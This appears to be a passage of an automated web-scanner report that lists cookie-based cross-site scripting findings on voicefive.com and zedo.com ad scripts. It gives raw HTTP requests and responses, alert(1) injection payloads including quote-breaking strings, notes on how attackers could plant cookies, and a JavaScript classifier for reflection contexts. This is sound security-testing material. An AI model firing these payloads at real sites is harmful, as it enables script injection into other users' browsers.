Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&ecc7f<script>alert(1)</script>d67fa7f6f9b; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&ecc7f<script>alert(1)</script>d67fa7f6f9b=&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&ecc7f<script>alert(1)</script>d67fa7f6f9b', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&', "ar_p84532700": 'exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:
...[SNIP]...

1.495. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p86183782 cookie is copied unmodified into the application's response. The payload f53aa<script>alert(1)</script>f1a0313fbec was submitted in the ar_p86183782 cookie and is echoed inside a single-quoted JavaScript string literal ("ar_p86183782": '...&arc=40675901&f53aa<script>alert(1)</script>f1a0313fbec') in a response served with Content-Type: application/x-javascript. The scanner template's description of the reflection as plain text between HTML tags does not match this response.

This proof of concept demonstrates that arbitrary text reaches a script response without encoding. It does not demonstrate script execution: a <script> tag inside a JavaScript string literal is inert, and broker.pli is fetched as an external script rather than parsed as HTML. To execute code an attacker would need a cookie value that terminates the single-quoted literal with an unescaped ', which this payload does not attempt. Treat the "Certain" confidence above as certainty about the reflection only, and re-test with a quote-breaking payload before reporting this as exploitable XSS.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker first needs a way to plant a chosen value in the victim's browser. The usual routes are a cookie-setting or header-injection flaw on any host under the same registrable domain (a cookie with domain=.voicefive.com, the scope this server uses in its own Set-Cookie headers, can be set from any voicefive.com subdomain) or, since the endpoint is served over plain http://, an attacker on the network path who adds a Set-Cookie header to any response. This limitation considerably mitigates the impact of the vulnerability.
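The difference between the two kinds of finding in this part of the report (a payload that merely lands inside a script string literal, as in this issue, and one whose own quote character terminates the literal, as in the ZEDO and AppNexus issues below) can be checked mechanically from the response. The following is an added example, not code from the scanner or from any of the scanned sites; the sample bodies are constructed from the echoed fragments shown in this report and shortened, the html_text sample is invented to show the context the scanner template describes, and the literal tracker is deliberately simplified (it ignores comments, regular expressions and template literals):

```javascript
'use strict';

// Added example (not code from the scanner or the scanned sites): decide where
// a reflected payload lands in a response and whether the payload's own
// characters can terminate that context.

// Scan JavaScript source and return the quote character of the string literal
// still open at the end, or null when the end is in plain code.
function openQuoteAt(src) {
  let quote = null;
  for (let i = 0; i < src.length; i++) {
    const ch = src[i];
    if (quote) {
      if (ch === '\\') i++;                 // skip the escaped character
      else if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    }
  }
  return quote;
}

// Returns { context, exploitable } for the first occurrence of payload in body.
function classifyReflection(contentType, body, payload) {
  const at = body.indexOf(payload);
  if (at < 0) return { context: 'none', exploitable: false };

  const isHtml = /html/i.test(contentType);
  let inScript = /javascript/i.test(contentType);
  let scriptStart = 0;
  if (isHtml) {
    // Inline script: a <script ...> before the reflection with no </script> after it.
    const m = body.slice(0, at).match(/<script\b[^>]*>(?![\s\S]*<\/script)/i);
    if (m) { inScript = true; scriptStart = m.index + m[0].length; }
  }

  if (!inScript) {
    // HTML text between tags: a literal tag in the payload is parsed as markup.
    return { context: 'html-text', exploitable: /<[a-z][^>]*>/i.test(payload) };
  }

  const quote = openQuoteAt(body.slice(scriptStart, at));
  if (quote === null) return { context: 'js-code', exploitable: true };
  const context = quote === '"' ? 'js-double' : 'js-single';
  // Inside a literal only the matching quote ends it; in an inline script a
  // literal </script> also ends the whole script block regardless of quoting.
  const exploitable = payload.includes(quote) || (isHtml && /<\/script/i.test(payload));
  return { context, exploitable };
}

// Constructed samples, trimmed from the responses shown in this report.
const SAMPLES = {
  voicefive_1_495: {
    contentType: 'application/x-javascript',
    payload: 'f53aa<script>alert(1)</script>f1a0313fbec',
    body: `var ar = {"ar_p86183782": 'exp=2&prad=59264590&arc=40675901&f53aa<script>alert(1)</script>f1a0313fbec', "ar_p45555483": 'exp=1&prad=59007464&'};`,
  },
  zedo_1_497: {
    contentType: 'application/x-javascript',
    payload: '5f097"-alert(1)-"548f1a5dacf',
    body: `var zzSection=916;var zzPat='';
var zzStr = "s=916;u=INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf;z=" + Math.random();`,
  },
  adnxs_1_501: {
    contentType: 'text/html; charset=utf-8',
    payload: "7b313'-alert(1)-'9993ffb1984",
    body: `<html><body style="margin-left: 0%"><script type="text/javascript">
<!--
(function(){var flashAd='<OBJECT id="160209410712429838" data="http://cdn.example/ad.swf?cnd=!VxeUoQi.7b313'-alert(1)-'9993ffb1984/clickenc=http%3A%2F%2Fexample" WIDTH="300">';`,
  },
  html_text: {  // the context the scanner template describes; invented, not from this report
    contentType: 'text/html',
    payload: 'f53aa<script>alert(1)</script>f1a0313fbec',
    body: `<p>Last seen: f53aa<script>alert(1)</script>f1a0313fbec</p>`,
  },
};

function classifyAll() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) {
    out[name] = classifyReflection(s.contentType, s.body, s.payload);
  }
  return out;
}

console.log(classifyAll());
```

Run with node. For the voicefive sample the result is js-single with exploitable false, which is the point the scanner template misses; for the ZEDO and AppNexus samples the payload carries the quote that matches the open literal and is flagged; the invented html_text sample is the only one where a <script> tag on its own is enough.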

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&f53aa<script>alert(1)</script>f1a0313fbec; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
d Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&f53aa<script>alert(1)</script>f1a0313fbec', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

1.496. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p84053757 cookie is copied unmodified into the application's response. The payload 5a71a<script>alert(1)</script>5abd27d3fc1 was appended to the existing ar_s_p84053757 value and is echoed inside a single-quoted JavaScript string literal ("ar_s_p84053757": '1->12976066755a71a<script>alert(1)</script>5abd27d3fc1') in a response served with Content-Type: application/x-javascript, not as plain text between HTML tags as the scanner template states.

This proof of concept shows only that the cookie reaches a script response without encoding. A <script> tag inside a JavaScript string literal does not execute, and broker.pli is loaded as a script rather than parsed as HTML, so code execution would require a cookie value that terminates the single-quoted literal with an unescaped '. This payload does not attempt that; re-test with a quote-breaking payload before reporting the finding as exploitable XSS.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker needs a way to plant a chosen value in the victim's browser, typically a cookie-setting or header-injection flaw on any voicefive.com host (the server's own cookies are scoped to domain=.voicefive.com) or, as the endpoint is plain http://, an attacker on the network path. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->12976066755a71a<script>alert(1)</script>5abd27d3fc1; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
p=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&', "ar_s_p84053757": '1->12976066755a71a<script>alert(1)</script>5abd27d3fc1', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sa
...[SNIP]...

1.497. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload 5f097"-alert(1)-"548f1a5dacf was submitted in the ZEDOIDA cookie and is echoed unmodified in the response, in the line var zzStr = "s=916;u=INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf;z=" + Math.random();.

This proof-of-concept attack demonstrates that arbitrary JavaScript can be injected into the application's response: the first " in the payload terminates the string literal, so the interpreter evaluates "s=916;u=..." - alert(1) - "...;z=" + Math.random() as an expression and alert(1) runs as soon as fm.js is loaded by any page that includes it. The response is a script (Content-Type: application/x-javascript), so no HTML parsing is involved and markup-based XSS filters do not apply. Note also that the response is cacheable (Cache-Control: max-age=63, served through Varnish, with Vary: Accept-Encoding only): if the intermediary caches fm.js without keying on the Cookie header, a reflected value could be served to other visitors of the same URL for up to 63 seconds. That is worth checking before rating this as an issue that affects only the user who carries the cookie.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker needs a way to plant a chosen value in the victim's browser, typically a cookie-setting or header-injection flaw on any zedo.com host (the server's own cookies are scoped to domain=.zedo.com) or, as the endpoint is plain http://, an attacker on the network path. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 4273

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='';var zzC
...[SNIP]...

       

                                                                                                                                                                                                                               var zzStr = "s=916;u=INmz6woBADYAAHrQ5V4AAACH~0104115f097"-alert(1)-"548f1a5dacf;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

1.498. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string literal enclosed in double quotation marks. The payload 296a5"-alert(1)-"d10b3dd5fdd was submitted in the ZEDOIDA cookie and is echoed unmodified in the line var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4AAACH~010411296a5"-alert(1)-"d10b3dd5fdd;z=" + Math.random();.

This proof-of-concept attack demonstrates that arbitrary JavaScript can be injected into the application's response: the payload's first " closes the literal, and alert(1) is evaluated as part of the surrounding expression when the script loads.

Note that a redirection occurred between the attack request and the response containing the echoed input. The redirection must be followed for the attack to succeed; a browser loading fm.js through a <script src> tag follows it automatically.

Because the reflected data arrives in a cookie, the behaviour is not trivial to exploit against another user: the attacker needs a way to plant a chosen value in the victim's browser, typically a cookie-setting or header-injection flaw on any zedo.com host (the server's own cookies are scoped to domain=.zedo.com) or, as the endpoint is plain http://, an attacker on the network path. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411296a5"-alert(1)-"d10b3dd5fdd; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; 